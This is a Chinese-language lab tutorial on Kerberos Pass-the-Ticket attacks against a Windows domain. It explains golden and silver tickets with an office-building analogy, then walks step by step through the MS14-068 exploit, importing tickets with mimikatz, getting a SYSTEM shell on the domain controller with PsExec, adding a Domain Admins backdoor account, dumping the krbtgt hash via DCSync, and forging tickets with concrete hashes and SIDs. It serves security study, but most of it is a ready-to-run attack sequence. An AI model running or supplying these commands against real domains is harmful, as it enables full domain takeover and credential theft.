1200字范文 > 域渗透PTT票据传递攻击(Pass the Ticket)

域渗透PTT票据传递攻击(Pass the Ticket)

时间：2021-03-21 11:41:20

文中主要讲解内网域环境，通过学习掌握域环境，更快知晓内网工作原理。本次实验环境靶场来自于暗月(moonsec)师傅，文中内容全由个人理解编制，若有错处，大佬勿喷，个人学艺不精；本文中提到的任何技术都源自于靶场练习，仅供学习参考，请勿利用文章内的相关技术从事非法测试，如因产生的一切不良后果与文章作者无关。

PTT 票据传递攻击(Pass the Ticket)

描述：

PTT票据传递主要根据kerberos协议&kerberos认证原理来进行攻击：

kerberos原理：打个比方：就好比A需要进入公司办公处，首先需要去门卫处验证是否是这个公司的人(也就是通过AS的认证)；然后通过门卫确认后，拿着门卫的凭证(也就是我们所需要TGT)去办公处里面，这时候我们如果需要去领导办公室查询资料(就是访问Sever)，那么就需要通过办公处的前台去登记，让前台确认我们是否有去查询的资格，当确认我们有资格后会给予凭证(就是ST)，我们就可以拿着这个凭证去领导办公室查询资料了。

借用我们上面的比方：来带入我们kerberos中：

首先 Client 向域控制器 DC 请求访问 Server，DC 通过去 AD 活动目录中查找依次区分 Client 来判断 Client 是否可信；认证通过后返回 TGT 给 Client，Client 得到 TGT（Ticket GrantingTicket）；Client 继续拿着 TGT 请求 DC 访问 Server，TGS 通过 Client 消息中的 TGT，判断 Client 是否有访问权限；如果有，则给 Client 有访问 Server 的权限 Ticket，也叫 ST（ServiceTicket）；Client 得到 Ticket 后，再去访问 Server，且该 Ticket 只针对这一个 Server有效；最终 Server 和 Client 建立通信。

如图就是这样的六步：

而我们下面要说的所谓的黄金票据和白银票据，借用我们上面的比方来进行讲解，让人更容易去理解：

黄金票据：就是我们攻击者伪装成这个公司的员工，自己伪造了一个门卫的凭证(TGT)，因此就不需要和门卫(AS)去登记，进入办公区(KDC)后，窃取了一个万能凭证(就是krbtgt账号)，拥有这个凭证就可以自有出入领导办公室查询资料。

白银票据：就是我们的攻击者拿到了这个公司领导办公室侧门的钥匙(也就是可以利用部分的服务，比如cifs)，他都不需要进入办公区(KDC)去找前台登记给予凭证(ST),拥有了钥匙直接去打开领导办公室的侧门进入查询资料。

票据传递攻击：

域内常用的两种攻击方式，分别为黄金票据和白银票据：

黄金票据原理：

在 Kerberos 认证中,Client 通过 AS(身份认证服务)认证后,AS 会给 Client 一个Logon Session Key 和 TGT,而 Logon Session Key 并不会保存在 KDC 中，krbtgt 的NTLM Hash 又是固定的,所以只要得到 krbtgt 的 NTLM Hash，就可以伪造 TGT 和Logon Session Key 来进入下一步 Client 与 TGS 的交互。而已有了金票后,就跳过AS 验证,不用验证账户和密码,所以也不担心域管密码修改。

特点：

不需要与 AS 进行交互，需要用户 krbtgt 的 Hash。

MS14-068

这个漏洞的原理就和黄金票据相似，所以我们先来复现这个漏洞：

原理：

通过生成黄金票据，导入工具中，将一个普通权限的域用户获取域管的使用权限，从而达到控制整个域。

当获取域用户时，对这个域进行信息收集：

获取是否MS14-068相应补丁情况：

systeminfo | findstr "3011780"

返回为空则没有相应的补丁

ms14-068exp使用方法：

ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员 sid -d 域控制器地址

收集域成员的SID：

whoami /all whoami /user #只单独查询SID

收集域管账号及域名称：

net time #获取域管账号net config workstation #获取域信息nltest /dsgetdc:moonsec #获取域管信息

构造成08server-dc.moonsec.fbi,在制作黄金票据中使用：

利用ms14-068的exp来生成一个黄金票据：

ms14-068.exe -u test@moonsec.fbi -p 123456 -s S-1-5-21-2801122135-3886333168-273474972-1103 -d 08server-dc.moonsec.fbi

这里我们可以先看下票据未导入前，是无法查看域控的C盘：

dir \\08server-dc.moonsec.fbi\C$ #这里必须使用计算机全名去查看，IP地址是不行的。

使用mimitakz导入票据：

kerberos::purge #清空票据kerberos::ptc 票据 #导入票据kerberos::list #查看票据

再次查看域控的C盘，现在是可以访问的：

dir \\08server-dc.moonsec.fbi\C$

使用psexec反弹cmd：

Psexec64.exe /accepteula /s \\08server-dc.moonsec.fbi cmd.exe

将cmd反弹出来，即可创建域管账号：

net user Longwaer QWEasd123 /add /domainnet group "Domain Admins" Longwaer /add /domain

金票制作：

这里我们已经假设获得了域管权限，然后我们利用mimikatz导出krbtgt账号信息：

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:moonsec.fbi /user:krbtgt" "exit">loghash.txt

利用mimikatz生成黄金票据：

mimikatz.exe "kerberos::golden /admin:system /domain:moonsec.fbi /sid:S-1-5-21-2801122135-3886333168-273474972 /krbtgt:811a536cf58aa23ceb8d439ffb386e6f /ticket:ticket.kirbi" exit

将票据注入内存：

kerberos::purge #清除票据kerberos:: ptt 票据 #将票据注入内存

成功访问：

白银票据原理：

如果说黄金票据是伪造的 TGT,那么白银票据就是伪造的 ST。在 Kerberos 认证的第三部，Client 带着 ST 和 Authenticator3 向 Server 上的某个服务进行请求，Server 接收到 Client 的请求之后,通过自己的 Master Key 解密 ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问 server 上的指定服务了。所以我们只需要知道 Server 用户的 Hash 就可以伪造出一个 ST,且不会经过 KDC,但是伪造的门票只对部分服务起作用。

特点：

不需要与KDC进行交互；需要server的NTLM hash。

银票制作：

假设我们已经获得域管权限，使用mimikatz导出信息：

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

然后利用server的NTLM hash制作银票：

使用方法：

kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目标服务器主机名> /service:<服务类型> /rc4:<NTLM Hash> /user:<用户名> /ptt

kerberos::purgekerberos::golden /domain:moonsec.fbi /sid:S-1-5-21-2801122135-3886333168-273474972 /target:08server-dc.moonsec.fbi /service:cifs /rc4:d0584c0b6d8ef7693ecaca2469348555 /user:administrator /ptt

这里rc4：使用的是08server-dc的ntlm hash